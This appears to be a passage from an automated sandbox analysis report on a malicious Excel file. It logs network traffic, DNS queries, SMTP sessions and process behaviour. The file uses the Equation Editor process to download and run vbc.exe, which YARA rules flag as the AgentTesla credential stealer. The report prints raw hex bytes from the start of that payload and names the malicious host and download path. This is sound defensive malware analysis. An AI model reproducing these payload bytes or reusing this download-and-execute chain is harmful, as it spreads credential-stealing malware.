                                                                                              Jan 13, 2021 13:19:01.284967899 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:01.284990072 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:01.285017014 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:01.285093069 CET49166587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:01.463238955 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:01.463382006 CET49166587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:01.473512888 CET49166587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:01.651669979 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:01.652407885 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:01.652427912 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:01.652492046 CET49166587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:03.577500105 CET49166587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:03.755781889 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:03.757741928 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:03.759906054 CET49166587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:03.938066959 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:03.939678907 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:03.940247059 CET49166587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:04.118489027 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:04.122653008 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:04.123727083 CET49166587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:04.301908970 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:04.305469990 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:04.305797100 CET49166587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:04.484153986 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:04.514257908 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:04.514564991 CET49166587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:04.692724943 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:04.693543911 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:04.697196007 CET49166587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:04.697333097 CET49166587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:04.697971106 CET49166587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:04.697998047 CET49166587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:04.875361919 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:04.875402927 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:04.876013041 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:04.887970924 CET58749166199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:04.986665010 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:05.102345943 CET49166587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:05.173521042 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:05.173831940 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:05.362668991 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:05.362907887 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:05.549367905 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:05.549592972 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:05.550520897 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:05.736862898 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:05.737438917 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:05.923769951 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:05.923934937 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:05.923952103 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:05.924273968 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:05.925012112 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:05.933186054 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:06.111524105 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:06.111572027 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:06.119518995 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:06.119920015 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:06.120223045 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:06.307076931 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:06.315596104 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:06.317471981 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:06.504018068 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:06.506623030 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:06.507002115 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:06.693684101 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:06.698865891 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:06.701898098 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:06.888432980 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:06.913295984 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:06.913789988 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:07.100327015 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:07.101274967 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:07.103310108 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:07.103349924 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:07.103483915 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:07.103487968 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:07.104552031 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:07.289700985 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:07.289724112 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:07.289809942 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:07.390470028 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:07.390686989 CET49168587192.168.2.22199.193.7.228
                                                                                              Jan 13, 2021 13:19:07.476185083 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:07.577121019 CET58749168199.193.7.228192.168.2.22
                                                                                              Jan 13, 2021 13:19:07.590276003 CET58749168199.193.7.228192.168.2.22

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 13, 2021 13:17:21.147867918 CET5219753192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:17:21.508595943 CET53521978.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:17:21.509027958 CET5219753192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:17:21.856992006 CET53521978.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:17:21.857408047 CET5219753192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:17:21.913824081 CET53521978.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:17:21.914427996 CET5219753192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:17:21.970621109 CET53521978.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:19:00.284296989 CET5309953192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:19:00.342308998 CET53530998.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:19:02.322484016 CET5283853192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:19:02.370596886 CET53528388.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:19:02.371534109 CET5283853192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:19:02.419559956 CET53528388.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:19:02.458683968 CET6120053192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:19:02.515177011 CET53612008.8.8.8192.168.2.22
                                                                                              Jan 13, 2021 13:19:02.515755892 CET6120053192.168.2.228.8.8.8
                                                                                              Jan 13, 2021 13:19:02.563786030 CET53612008.8.8.8192.168.2.22

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                              Jan 13, 2021 13:17:21.147867918 CET192.168.2.228.8.8.80xfc39Standard query (0)globuserinessserverfiletransferprotocol.mangospot.netA (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:17:21.509027958 CET192.168.2.228.8.8.80xfc39Standard query (0)globuserinessserverfiletransferprotocol.mangospot.netA (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:17:21.857408047 CET192.168.2.228.8.8.80xfc39Standard query (0)globuserinessserverfiletransferprotocol.mangospot.netA (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:17:21.914427996 CET192.168.2.228.8.8.80xfc39Standard query (0)globuserinessserverfiletransferprotocol.mangospot.netA (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:19:00.284296989 CET192.168.2.228.8.8.80x5aacStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                              Jan 13, 2021 13:17:21.508595943 CET8.8.8.8192.168.2.220xfc39No error (0)globuserinessserverfiletransferprotocol.mangospot.net192.210.214.178A (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:17:21.856992006 CET8.8.8.8192.168.2.220xfc39No error (0)globuserinessserverfiletransferprotocol.mangospot.net192.210.214.178A (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:17:21.913824081 CET8.8.8.8192.168.2.220xfc39No error (0)globuserinessserverfiletransferprotocol.mangospot.net192.210.214.178A (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:17:21.970621109 CET8.8.8.8192.168.2.220xfc39No error (0)globuserinessserverfiletransferprotocol.mangospot.net192.210.214.178A (IP address)IN (0x0001)
                                                                                              Jan 13, 2021 13:19:00.342308998 CET8.8.8.8192.168.2.220x5aacNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)

                                                                                              HTTP Request Dependency Graph

                                                                                              • globuserinessserverfiletransferprotocol.mangospot.net

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.2249165192.210.214.17880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Jan 13, 2021 13:17:22.163568020 CET1OUTGET /csrss/vbc.exe HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: globuserinessserverfiletransferprotocol.mangospot.net
                                                                                              Connection: Keep-Alive
                                                                                              Jan 13, 2021 13:17:22.339915037 CET2INHTTP/1.1 200 OK
                                                                                              Date: Wed, 13 Jan 2021 12:17:21 GMT
                                                                                              Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                                                                              Last-Modified: Wed, 13 Jan 2021 09:01:13 GMT
                                                                                              ETag: "ce000-5b8c461903ba5"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 843776
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-msdownload
                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d9 b6 fe 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d6 0c 00 00 08 00 00 00 00 00 00 3e f4 0c 00 00 20 00 00 00 00 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec f3 0c 00 4f 00 00 00 00 00 0d 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 d4 0c 00 00 20 00 00 00 d6 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 05 00 00 00 00 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 f4 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 3c 58 01 00 d8 a0 01 00 03 00 00 00 19 01 00 06 14 f9 02 00 d8 fa 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1e 00 00 0a 2a 26 00 02 28 1f 00 00 0a 00 2a ce 73 20 00 00 0a 80 01 00 00 04 73 21 00 00 0a 80 02 00 00 04 73 22 00 00 0a 80 03 00 00 04 73 23 00 00 0a 80 04 00 00 04 73 24 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 29 00 00 0a 0a 2b 00 06 2a 26 00 02 28 2a 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 2b 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2c 00 00 0a 6f 2d 00 00 0a 73 2e 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 1a 00 00 00 08 00 00 11 00 28 0a 00 00 06 72 3d 00 00 70 7e 07 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 08 00 00 04 14 28 2b 00 00 0a 0b 07 2c 21 72 47 00 00 70 d0 06 00 00 02 28 2c 00 00 0a 6f 2d 00 00 0a 73
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_P> @ @@O H.textD `.rsrc@@.reloc @B H<X(*&(*s s!s"s#s$*0~o%+*0~o&+*0~o'+*0~o(+*0~o)+*&(**0<~(+,!rp(,o-s.~+*0~+*"*0(r=p~o/+*0<~(+,!rGp(,o-s
                                                                                              Jan 13, 2021 13:17:22.339965105 CET4INData Raw: 2e 00 00 0a 0c 08 80 08 00 00 04 00 00 7e 08 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 09 00 00 04 0a 2b 00 06 2a 22 00 02 80 09 00 00 04 2a 13 30 03 00 26 00 00 00 09 00 00 11 00 28 0e 00 00 06 72 7b 00 00 70 7e 09 00 00
                                                                                              Data Ascii: .~+*0~+*"*0&(r{p~o0(1t$+*Vs(2t*(3*0~+*0(+*0T(4Qs5(6}(})}*
                                                                                              Jan 13, 2021 13:17:22.340003967 CET5INData Raw: 0a 00 02 6f 21 00 00 06 1f 5a 1f 14 73 44 00 00 0a 6f 45 00 00 0a 00 02 6f 21 00 00 06 1f 0a 6f 46 00 00 0a 00 02 6f 21 00 00 06 72 63 01 00 70 6f 4c 00 00 0a 00 02 6f 21 00 00 06 1f 10 6f 4d 00 00 0a 00 02 6f 23 00 00 06 18 6f 49 00 00 0a 00 02
                                                                                              Data Ascii: o!ZsDoEo!oFo!rcpoLo!oMo#oIo#rp"AsJoKo#(BsAoBo#rpoCo#ZsDoEo#oFo#rpoLo#oMo%oIo%rp"AsJ
                                                                                              Jan 13, 2021 13:17:22.340055943 CET6INData Raw: 88 00 00 00 1f 6a 73 41 00 00 0a 6f 42 00 00 0a 00 02 6f 39 00 00 06 72 a3 02 00 70 6f 43 00 00 0a 00 02 6f 39 00 00 06 1f 14 1f 14 73 44 00 00 0a 6f 45 00 00 0a 00 02 6f 39 00 00 06 1f 15 6f 46 00 00 0a 00 02 6f 39 00 00 06 72 c5 00 00 70 6f 47
                                                                                              Data Ascii: jsAoBo9rpoCo9sDoEo9oFo9rpoGo9oHo; ~sAoBo;rpoCo;sDoEo;oFo;rpoGo;oHo=oNo= sAoB
                                                                                              Jan 13, 2021 13:17:22.514180899 CET8INData Raw: 00 02 6f 49 00 00 06 1f 26 20 2e 01 00 00 73 41 00 00 0a 6f 42 00 00 0a 00 02 6f 49 00 00 06 72 ed 03 00 70 6f 43 00 00 0a 00 02 6f 49 00 00 06 1f 75 1f 17 73 44 00 00 0a 6f 45 00 00 0a 00 02 6f 49 00 00 06 1f 1c 6f 46 00 00 0a 00 02 6f 49 00 00
                                                                                              Data Ascii: oI& .sAoBoIrpoCoIusDoEoIoFoIrpoGoIoHoKoY\%oMoZoK PsAoBoKrpoCoK sDoEoKoFoKrpo[oMr!
                                                                                              Jan 13, 2021 13:17:22.514231920 CET9INData Raw: 13 00 00 04 02 7b 13 00 00 04 0b 07 2c 07 07 06 6f 6b 00 00 0a 2a 26 02 7b 14 00 00 04 2b 00 2a 00 00 00 13 30 02 00 37 00 00 00 0d 00 00 11 02 fe 06 55 00 00 06 73 35 00 00 0a 0a 02 7b 14 00 00 04 0b 07 2c 07 07 06 6f 6a 00 00 0a 02 03 7d 14 00
                                                                                              Data Ascii: {,ok*&{+*07Us5{,oj}{,ok*&{+*07Ws5{,oj}{,ok*&{+*07Ys5{,oj}
                                                                                              Jan 13, 2021 13:17:22.514280081 CET11INData Raw: 6d 00 00 0a 6f 6e 00 00 0a 0a 12 00 28 6f 00 00 0a 28 70 00 00 0a 58 28 71 00 00 0a 28 72 00 00 0a 6f 4c 00 00 0a 00 02 6f 23 00 00 06 72 c7 04 00 70 02 7b 2a 00 00 04 6c 28 07 00 00 06 6f be 02 00 06 7b af 00 00 04 72 e5 04 00 70 28 6d 00 00 0a
                                                                                              Data Ascii: mon(o(pX(q(roLo#rp{*l(o{rp(mon(o(pX(q(roLo!rp{+l(o{rp(mon(o(pX(q(roLorp{,l(o{rp(mon
                                                                                              Jan 13, 2021 13:17:22.514339924 CET12INData Raw: 7b 28 00 00 04 28 07 00 00 06 6f be 02 00 06 7b af 00 00 04 72 a7 04 00 70 28 6d 00 00 0a 6f 6e 00 00 0a d6 0d 12 03 28 6f 00 00 0a 28 72 00 00 0a 6f 4c 00 00 0a 00 02 6f 43 00 00 06 02 7c 2e 00 00 04 28 6f 00 00 0a 6f 4c 00 00 0a 00 00 2a 00 00
                                                                                              Data Ascii: {((o{rp(mon(o(roLoC|.(ooL*0$oMrWpos{){._,z|)%JT|.%JTo%rp{)(o{rp(mon(o(roLoC|.
                                                                                              Jan 13, 2021 13:17:22.514379025 CET14INData Raw: fe 04 16 fe 01 02 7b 2a 00 00 04 1f 10 fe 04 5f 02 7b 2e 00 00 04 18 fe 04 16 fe 01 5f 0d 09 2c 7a 02 7c 2a 00 00 04 25 0b 07 4a 17 d6 54 02 7c 2e 00 00 04 25 0b 07 4a 18 da 54 02 6f 23 00 00 06 72 c7 04 00 70 02 7b 2a 00 00 04 28 07 00 00 06 6f
                                                                                              Data Ascii: {*_{._,z|*%JT|.%JTo#rp{*(o{rp(mon(o(roLoC|.(ooL8{*{*_{._,w|*%JT|.%JTo#rp{*(
                                                                                              Jan 13, 2021 13:17:22.514419079 CET15INData Raw: 0a d6 0c 12 02 28 6f 00 00 0a 28 72 00 00 0a 6f 4c 00 00 0a 00 02 6f 43 00 00 06 02 7c 2e 00 00 04 28 6f 00 00 0a 6f 4c 00 00 0a 00 00 2b 37 02 7b 2b 00 00 04 1f 12 fe 01 13 05 11 05 2c 14 02 6f 4d 00 00 06 72 3b 05 00 70 6f 73 00 00 0a 00 00 2b
                                                                                              Data Ascii: (o(roLoC|.(ooL+7{+,oMr;pos+oMrpos*0oMrWpos{+,oMr#pos8{+,z|+%JT|.%JTo!rp{+(o{
                                                                                              Jan 13, 2021 13:17:22.514458895 CET17INData Raw: 00 00 0a 6f 4c 00 00 0a 00 02 6f 43 00 00 06 02 7c 2e 00 00 04 28 6f 00 00 0a 6f 4c 00 00 0a 00 00 38 2b 01 00 00 02 7b 2c 00 00 04 1f 0e fe 02 02 7b 2c 00 00 04 1f 10 fe 02 16 fe 01 5f 13 04 11 04 2c 7a 02 7c 2c 00 00 04 25 0c 08 4a 17 da 54 02
                                                                                              Data Ascii: oLoC|.(ooL8+{,{,_,z|,%JT|.%JTorp{,(o{rp(mon(o(roLoC|.(ooL8{,{,_,u|,%JT|.%J


                                                                                              SMTP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                              Jan 13, 2021 13:19:00.728404999 CET58749166199.193.7.228192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                              Jan 13, 2021 13:19:00.728996992 CET49166587192.168.2.22199.193.7.228EHLO 414408
                                                                                              Jan 13, 2021 13:19:00.907455921 CET58749166199.193.7.228192.168.2.22250-mta-11.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250 STARTTLS
                                                                                              Jan 13, 2021 13:19:00.907985926 CET49166587192.168.2.22199.193.7.228STARTTLS
                                                                                              Jan 13, 2021 13:19:01.086139917 CET58749166199.193.7.228192.168.2.22220 Ready to start TLS
                                                                                              Jan 13, 2021 13:19:05.362668991 CET58749168199.193.7.228192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                              Jan 13, 2021 13:19:05.362907887 CET49168587192.168.2.22199.193.7.228EHLO 414408
                                                                                              Jan 13, 2021 13:19:05.549592972 CET58749168199.193.7.228192.168.2.22250-mta-11.privateemail.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 81788928
                                                                                              250-ETRN
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250 STARTTLS
                                                                                              Jan 13, 2021 13:19:05.550520897 CET49168587192.168.2.22199.193.7.228STARTTLS
                                                                                              Jan 13, 2021 13:19:05.736862898 CET58749168199.193.7.228192.168.2.22220 Ready to start TLS

                                                                                              Code Manipulations

                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              Analysis Process: EXCEL.EXE PID: 1296 Parent PID: 584

                                                                                              General

                                                                                              Start time:13:16:43
                                                                                              Start date:13/01/2021
                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                              Imagebase:0x13fe00000
                                                                                              File size:27641504 bytes
                                                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Chronological Activities

                                                                                              Analysis Process: EQNEDT32.EXE PID: 2492 Parent PID: 584

                                                                                              General

                                                                                              Start time:13:17:04
                                                                                              Start date:13/01/2021
                                                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                              Imagebase:0x400000
                                                                                              File size:543304 bytes
                                                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Chronological Activities

                                                                                              Analysis Process: vbc.exe PID: 1616 Parent PID: 2492

                                                                                              General

                                                                                              Start time:13:17:08
                                                                                              Start date:13/01/2021
                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Users\Public\vbc.exe'
                                                                                              Imagebase:0x1030000
                                                                                              File size:843776 bytes
                                                                                              MD5 hash:B232B5C7754D932B07C0D47F934EFBFE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2165947138.0000000003519000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              Reputation:low

                                                                                              Chronological Activities

                                                                                              Analysis Process: vbc.exe PID: 552 Parent PID: 1616

                                                                                              General

                                                                                              Start time:13:17:15
                                                                                              Start date:13/01/2021
                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\Public\vbc.exe
                                                                                              Imagebase:0x1030000
                                                                                              File size:843776 bytes
                                                                                              MD5 hash:B232B5C7754D932B07C0D47F934EFBFE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              Reputation:low

                                                                                              Chronological Activities

                                                                                              Disassembly

                                                                                              Code Analysis

                                                                                              Reset < >

